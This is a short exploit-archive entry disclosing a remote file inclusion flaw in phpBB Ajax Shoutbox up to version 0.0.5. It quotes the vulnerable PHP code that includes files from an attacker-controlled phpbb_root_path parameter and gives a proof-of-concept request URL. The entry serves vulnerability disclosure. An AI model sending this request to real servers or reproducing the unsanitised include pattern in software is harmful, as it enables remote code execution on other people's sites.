id: 972
date: 10/11/2006
title: phpBB Ajax Shoutbox <= 0.0.5 Remote File Include Vulnerability
author: boecke
cves: 

==============================================================
phpBB Ajax Shoutbox <= 0.0.5 Remote File Include Vulnerability
==============================================================



#
# *
# * Title: phpBB Ajax Shoutbox <= 0.0.5 (phpbb_root_path) Remote File Inclusion
# * Author/Discovery: boecke
# * Vulnerability Type: Remote File Inclusion
# * Risk: High Risk
# * Software Affected: phpBB Ajax Shoutbox <= 0.0.5
# *
# * Literally shouts to: str0ke and henrik
# * Don't promote Google-ism!
# *
#

[ Vulnerable Code: ]
$phpbb_root_path = ( !@$phpbb_root_path ) ? './' : $phpbb_root_path;
require_once($phpbb_root_path . 'extension.inc');
require_once($phpbb_root_path . 'common.'.$phpEx);

[ Proof on Concept: ]
http://localhost/phpBB2/shoutbox.php?phpbb_root_path=



#  0day.today [2023-03-27]  #